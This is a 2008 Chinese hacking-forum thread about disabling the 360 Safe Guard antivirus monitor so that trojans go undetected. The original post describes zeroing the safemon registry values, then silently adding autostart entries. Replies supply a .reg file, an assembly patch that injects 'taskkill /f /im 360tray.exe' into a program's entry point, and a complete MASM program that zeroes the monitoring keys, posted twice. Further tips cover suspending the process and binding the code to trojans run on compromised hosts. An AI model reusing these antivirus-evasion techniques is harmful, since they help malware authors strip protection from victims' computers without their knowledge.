[原创]突破360安全卫士监控
文章作者:xxfish信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
相信很多木马作者写的木马都不过360安全卫士监控,如目前的pcshare等,,不列举。我的朋友之前采取的是K进程,我也一样。但是目前不行了。我之前在黑防发过一篇逆向工程打造过360安全卫士,但是发现计算机重新启动后,360还是会有提示。
这样我们的木马还是过不了360,于是我开始从360的目录里下手,看是否可以找到相应的可利用的地方,找了下,有几个地方也可以利用..不过想法很天真。 于是我找找注册表。我发现他有一个safemon很明显从字面意思就可以断定,和安全相关。进去后发现有4个键值,我猜测到,这肯定就是那4个监控所对应的键值。 ExecAccess ,MonAccess,SiteAccess,UDiskAccess 4个键值。字面意思我就猜测到我之前的想法肯定是对的 都是16进制00000001,那么0肯定就是关闭。修改后。果然 嘿嘿。 360的监控就over了。。 其实人的思路有很多..不管是360还是各种杀软我想肯定都有突破的地方。。重在你是否去研究了....
ps: 发挥的空间很大。比如说先修改为0,360监控就关闭了。然后你就可以写注册表项或者服务启动,写完后在修改回来。360无任何提示... 或者你直接K掉360进程,然后在修改为0,在修改回来。(但是有点多此一举了)。。发挥的空间很大。。 自己慢慢发挥吧。。
思路很简单,但是这里只考虑了360安全卫士,杀毒软件的注册表监控没有考虑在内, 大家可以去参照下xyzreg大哥的 突破突破主动防御之注册表监控篇文章,非常不错值得大家仔细观看。 然后再内外结合起来,就OK了。。
引用段xyzreg大哥的话 本程序仅作科普以及安全警示之用,旨在提高大家安全意识以及选择更好的安全产品。勿将程序中的方法用于非法用途。
产生任何板砖效应概不负责,希望可以帮助到很多朋友。简单发个演示程序..
[attach]10927[/attach] [quote]引用第1楼雷锋精神于2008-01-22 19:35发表的 :
[s:264] 360用个批就搞定了,哈哈!沙发![/quote]
恩...自己批处理写个修改注册表就OK了。。 然后和木马捆绑。不过这样体积会增大,并且隐蔽性不佳,其实逆向工程来增加下修改注册表的代码也用不了多少时间。。 自己发挥吧。。。 学习去... 但是这个测试程序没反应哦。。楼主 自己看你的360监控是否关闭。。 我没加任何消息框,所以没任何提示... 一般直接kiil掉360就足以.
重启的时间,病毒木马可以做很多事情,特别在RING0下...
之后就不用在乎360这种提示性的监控了.
呵呵.不过这是一种思路呀~
赞一个 [quote]引用第7楼sudami于2008-01-22 20:54发表的 :
一般直接kiil掉360就足以.
重启的时间,病毒木马可以做很多事情,特别在RING0下...
之后就不用在乎360这种提示性的监控了.
呵呵.不过这是一种思路呀~
.......[/quote]
偶等菜鸟目前没到内核编程的地步。努力学习之... 还是ring 3下实现的功能稳定呀。一个思路而已。。 通过更改键值来使我们随意控制杀毒软件,是个思路。
不过卡巴是不会轻易就能过得…… [quote]引用第14楼a1pass于2008-01-25 21:51发表的 :
通过更改键值来使我们[b][color=#FF0000]随意控制[/color][/b]杀毒软件,是个思路。
[/quote]
牛...[s:267]
要是改个注册表就能随意控制,那就太和谐了. [quote]引用第15楼sudami于2008-01-25 21:56发表的 :
牛...[s:267]
要是改个注册表就能随意控制,那就太和谐了.[/quote]
这么和谐的事情往往出于口误,现实生活中不会发生,望楼上勿惊~~~ 汇编下:
push 0
push 00408888
call WinExec
jmp 入口
在00408888写taskkill /f /im 360tray.exe
改入口到push 0地址 ring几啥意思啊,纯内核。。。不过这点360确实没有做好啊,至于逆向工程还太遥远饿。。。。 Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]
"ExecAccess"=dword:00000000
"SiteAccess"=dword:00000000
"MonAccess"=dword:00000000
"LeakAccess"=dword:00000000
"UDiskAccess"=dword:00000000
"lastup"=hex:d8,07,00,00,02,00,00,00,0e,00,00,00,00,00,00,00,37,00,00,00,01,00,\
00,00
"ARPAccess"=dword:00000000
全改成0,360卫士直接自动退出了.不用终止进程.呵呵.楼主的这个发现真不错. 在小熊上比较早就有人发了类似的方法了 楼主可以去找找看 把控制放在注册表好象太不安全了吧 思路不错,谢谢楼主分享。
不过想问一下楼主为什么用你的那个测试程序360MON关了并且进程自动退出了,但是直接导注册表360确没有退出? 楼主在程序里直接把进程给KiLL了? :shocked: 呵呵,大家的鬼电子还真不少啊,不过早就知道360可以直接kill掉,一直就没在乎过它。
有时间多研究研究微点和卡巴,这两个东西比较牛X。 360几个关键项,以关闭。未曾提示,它应该改进一下。定期监测实时监控是否被恶意关闭,并提示用户。 哎,我当初也考虑过360是不是把它的监控功能放到那里作为参数了.不过我把注意力放到它的安装目力里了,当时忘记去看注册表了,因为我以为360肯定是用什么加密规则来弄的,没想到在注册表里这么明显.现在问题出来了,不知道官方会不会补了它
[[i] 本帖最后由 sweet 于 2008-3-4 15:09 编辑 [/i]]
此方法不可行
MSN启动后,safe360会提示注册表表项写入,按照楼主的方法,把注册表修改后,仍旧提示,无效 直接杀进程太直接了,摆明告诉肉鸡:"我来了"...360的进程没有做到任何自我保护防范.NtSuspendProcess函数可以把它给睡眠就可以了.:lol:
ssdt
恢复ssdt可以过卡巴,但是没有试过其它的 直接杀进程太直接了,摆明告诉肉鸡:"我来了"... 有更好的办法吗? 这篇我是用手机看得没有机会上机测试~想问一下文中的那四个键值如果不是全修改是个什么情况~ 确实很简单.测试360最新版已经过了 这个是不错的思路 最新4。18亦可以通过 *** 作者被禁止或删除 内容自动屏蔽 *** 最晚看见ASM用汇编实现的部分代码,今天找时没有了自己来写一个,练练手,学了汇编还没有好好用过,写的很菜,呵呵
.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
_kill360 proto
.data
szPath db 'software\360safe\safemon',0
szKeyName0 db 'ExecAccess',0
szKeyName1 db 'SiteAccess',0
szKeyName2 db 'MonAccess',0
szKeyName3 db 'UDiskAccess',0
szKeyName4 db 'LeakAccess',0
szKeyName5 db 'ARPAccess',0
Data dd 0h
.code
start:
invoke _kill360
_kill360 proc
local hKey:dword
local hsize:dword
local nCode:dword
local pData:dword
mov eax, sizeof dword
mov hsize, eax
invoke RegCreateKey, HKEY_LOCAL_MACHINE, addr szPath, addr hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx, hKey, addr szKeyName0, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName1, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName2, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName3, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName4, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName5, NULL, REG_DWORD, addr Data, hsize
invoke RegCloseKey, hKey
.endif
ret
_kill360 endp
end start 搞不懂这么大的问题难道360没考虑过么= =? 思路是不错。。但放在注册表里不安全吧!! 试了。。。没反应呀。。。 不好意思呀。。。有用的。。。。可以关闭的呀。。哈哈!~!~! 很遗憾的告诉大家,测试以失败告终.....360直接无视... 我的是4.2版本的,开的保险箱,修改完注册表后,就直接在360中看到关闭了 如果系统安装瑞星杀毒软件是否还能实现?
因为瑞星有注册表监控,所以做这个更改很难过瑞星吧 .386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
_kill360 proto
.data
szPath db 'software\360safe\safemon',0
szKeyName0 db 'ExecAccess',0
szKeyName1 db 'SiteAccess',0
szKeyName2 db 'MonAccess',0
szKeyName3 db 'UDiskAccess',0
szKeyName4 db 'LeakAccess',0
szKeyName5 db 'ARPAccess',0
Data dd 0h
.code
start:
invoke _kill360
_kill360 proc
local hKey:dword
local hsize:dword
local nCode:dword
local pData:dword
mov eax, sizeof dword
mov hsize, eax
invoke RegCreateKey, HKEY_LOCAL_MACHINE, addr szPath, addr hKey
.if eax == ERROR_SUCCESS
invoke RegSetValueEx, hKey, addr szKeyName0, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName1, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName2, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName3, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName4, NULL, REG_DWORD, addr Data, hsize
invoke RegSetValueEx, hKey, addr szKeyName5, NULL, REG_DWORD, addr Data, hsize
invoke RegCloseKey, hKey
.endif
ret
_kill360 endp
end start
这个怎么能添加到程序里呢?
高手指点一下
这个现在还能用不?
页:
[1]